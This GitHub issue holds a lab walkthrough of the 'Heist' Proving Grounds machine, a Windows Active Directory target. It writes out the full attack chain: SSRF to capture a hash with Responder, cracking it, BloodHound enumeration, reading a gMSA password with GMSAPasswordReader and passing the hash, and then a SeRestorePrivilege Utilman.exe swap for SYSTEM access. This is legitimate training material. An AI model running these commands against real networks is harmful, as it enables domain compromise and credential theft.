search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Heist (Hard, Windows AD, 2021) ★ -- SSRF, GMSAPasswordReader, SeRestorePrivilege #57

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoinst:

WDavid404 commented 3 months ago 
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain?       syn-ack ttl 125
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-09 00:11:38Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125

3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Issuer: commonName=DC01.heist.offsec

5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

8080/tcp  open  http          syn-ack ttl 125 Werkzeug httpd 2.0.1 (Python 3.9.0)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Super Secure Web Browser

9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49707/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49758/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

53/tcp

--> no interesting info

139/tcp, 445/tcp (SMB)

--> no info

389 (LDAP)

rootDomainNamingContext: DC=heist,DC=offsec ldapServiceName: heist.offsec:dc01$@HEIST.OFFSEC dnsHostName: DC01.heist.offsec

ldapsearch -H ldap://192.168.173.165 -x -b"DC=heist,DC=offsec" --> no info

GetNPUsers.py heist.offsec/ -dc-ip $IP --> no info image

3389/tcp

--> no interesting info add domain name (DC01.heist.offsec) to /etc/hosts

8080/tcp

image

search exploit info about Werkzeug httpd 2.0.1 -->

Try access our test file in kali --》 work image

sudo responder -I tun0 -wv (Need to close our http.server that is using 80 port) image

Crack the hash:john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt -->california image

crackmapexec smb 192.168.173.165 -u enox -p california --continue-on-success crackmapexec winrm192.168.173.165 -u enox -p california --continue-on-success --> image image

evil-winrm -i 192.168.173.165 -u enox -p california image

WDavid404 commented 3 months ago

PE

Refer to

whoami /priv --> no interesting info image

cmdkey /list --> no credential info image

cmd.exe /c dir /a C:\ image

ls "program files" image

icalcs "C:\Program Files\nasm-2.24\win64\nssm.exe"
icalcs "C:\Program Files\nasm-2.24\win64"

image

ls "program files (x86)" --> No interesting non-default files / folders.

netstat -nao --> No ports open internally (127.0.0.1) or ports blocked by the firewall. Seeing only the same ports as the nmap scan.

Nothing juicy was found with PowerUp. Nothing juicy was found with WinPEAS.

Domain Enumeration Using Bloodhound.py and PowerView.ps1

sudo /opt/BloodHound_py/bloodhound.py -d heist.offsec -u enox -p california -c all -ns 192.168.164.165 OR bloodhound-python -d heist.offsec -u enox -p california -c all -ns 192.168.164.165 image

image

started both bloodhound and neo4j in separate tabs on my attacker machine.

sudo neo4j console
sudo bloodhound

username:neo4j
password: password

Upload data: image

got to "Shortest Paths to High Value Targets" image

image This shows that the svc_apache service account can read the GMSA password, which means that the svc_apache account is a Group Managed Service Account (gMSA).

PS: On "SVC_APACHE$@HEIST.OFFSEC" --> select "Shortest paths to here" image image

Bloodhound description reveals a method in which we can extract the hash image

Using the following PowerShell command, we can confirm that this account is a service account with GMSA enabled: Get-ADServiceAccount -Filter * | where-object {$_.ObjectClass -eq "msDS-GroupManagedServiceAccount"} image

Extracting the gMSA Password Using GMSAPasswordReader.exe and Getting a Shell as svc_apache

GMSAPasswordReader.exe : https://github.com/expl0itabl3/Toolies .\GMSAPasswordReader.exe --accountname 'svc_apache' image

Then, evil-winrm -i 192.168.164.165 -u svc_apache$ -H 41bcd07b8cc9636826fe07ff9539ca57

image SeRestorePrivilege 

The SeRestorePrivilege is a special privilege required to restore files and directories. Accounts with this privilege are given write access to all files regardless of the access control list associated with files and directories. This means we can replace any system binary with one of our choosing.

Othere reference: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#serestoreprivilege

Abuse SeRestorePrivilege: Replace Utilman.exe with cmd.exe

image 上写真でログオン画面で、ログオンしないでもユーティリティマネージャが起動できるなら、コマンドプロンプトの実行ファイル名(cmd.exe)をユーティリティマネージャの実行ファイル名(Utilman.exe)に変えてしまえば、ユーティリティマネージャの代わりにコマンドプロンプトが起動はず、という仕組みです。

  1. found the Utilman.exe file using get-childitem cmdlet get-childitem -path C:\\Windows\\System32\\ -include utilman.exe -file -recurse -erroraction silentlycontinue

  2. backup it mv C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.old

  3. mv cmd.exe Utilman.exe 4.Opened the rdp session using rdesktop rdesktop $IP

  4. pressed win+u key --> the cmd prompt appeared image